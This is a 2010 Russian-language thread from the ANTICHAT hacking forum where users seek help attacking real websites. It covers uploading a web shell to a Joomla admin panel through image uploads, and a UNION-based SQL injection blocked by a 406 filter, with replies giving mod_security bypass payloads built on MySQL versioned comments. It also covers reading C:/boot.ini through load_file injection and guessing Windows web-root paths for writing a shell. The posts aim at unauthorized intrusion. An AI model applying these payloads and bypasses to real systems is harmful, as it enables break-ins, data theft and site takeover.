ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.09.2010, 12:03
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Доброго времени суток, уважаемые форумчане!
Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)
Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...
Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...
Заранее благодарю за помощь...
|
|
|
24.09.2010, 14:36
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от z0mbyak
z0mbyak said:
Доброго времени суток, уважаемые форумчане!
Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)
Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...
Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...
Заранее благодарю за помощь...
одной подменой mime-type не отделаешься - там еще проверка расширения идет.
|
|
|
|
24.09.2010, 15:25
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Не подскажете, как обойти фильтрацию.
module.php?id=104+union+select+1,version(),3,4--+
выводит 5.0.91-community
проверяю
module.php?id=104+union+select+1,2,version(),3,4+f rom+information_schema.tables--+
выводит версию, columns так же
Когда пытаюсь вывести таблицы table_name перебрасывает на страницу
Сообщение от None
406 Not Acceptable
An appropriate representation of the requested resource /products.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
column_name так же и из information_schema.columns
Выводится только table_schema (information_schema.tables/columns), остальное видимо фильтруется.
Пробовал обойти
CoLuMn_NaMe
cOlUmN_nAme
и т.д.
c table_name так же. Перебрасывает на 406 Not Acceptable
Подскажите как обойти фильтрацию.
Заранее благодарен. |
|
|
|
24.09.2010, 16:20
|
|
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485
Репутация:
13
|
|
Так и должно быть и нету тут фильтрации
module.php?id=104+union+select+1,version(),3,4--+
Это правильный запрос.
|
|
|
|
24.09.2010, 16:27
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от tracy
tracy said:
Так и должно быть и нету тут фильтрации
module.php?id=104+union+select+1,version(),3,4--+
Это правильный запрос.
Что? У него то же самое, он хочет не только версию, но и инфу из inf. schema вытащить
|
|
|
|
24.09.2010, 17:31
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
попугай прав. Зачем мне одна версия, имя бд и юзер. Мне нужна инфа о таблицах и колонках из information_schema.tables и information_schema.columns
Фильтруются при запросе column_name и table_name
table_schema нет, но этого мало. Иначе зачем мне уязвимость?
|
|
|
|
24.09.2010, 18:56
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
2 auth_root
Mod_Security
Код:
Code:
module.php?id=104+union+select+1,/*!table_name*/,3,4+from+information_schema.tables
Код:
Code:
module.php?id=104+union+select+1,/*12345!table_name*/,3,4+from+information_schema.tables
Либо сразу весь запрос загони в комментарии.
|
|
|
|
25.09.2010, 00:11
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.
Есть возможность читать файлы вот так:
id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696 e69),4+--+
где 0x633a5c626f6f742e696e69 - C:/boot.ini
Инклуд тоже не нашел, иначе бы в C:/ файл и залил.
Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...
Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?
Сталкиваюсь с таким в первый раз, потерялся))
|
|
|
|
25.09.2010, 00:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
brutos попробуй
c:\wwwroot\имя сайта\
c:\wwwroot\имя сайта\htdocs\
c:\wwwroot\имя сайта\www\
c:\wwwroot\htdocs\
и т.д.
|
|
|
|
25.09.2010, 00:30
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
Konqi, спасибо. Пока глухо, буду искать дальше, но уже хоть есть от чего оттолкнуться)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
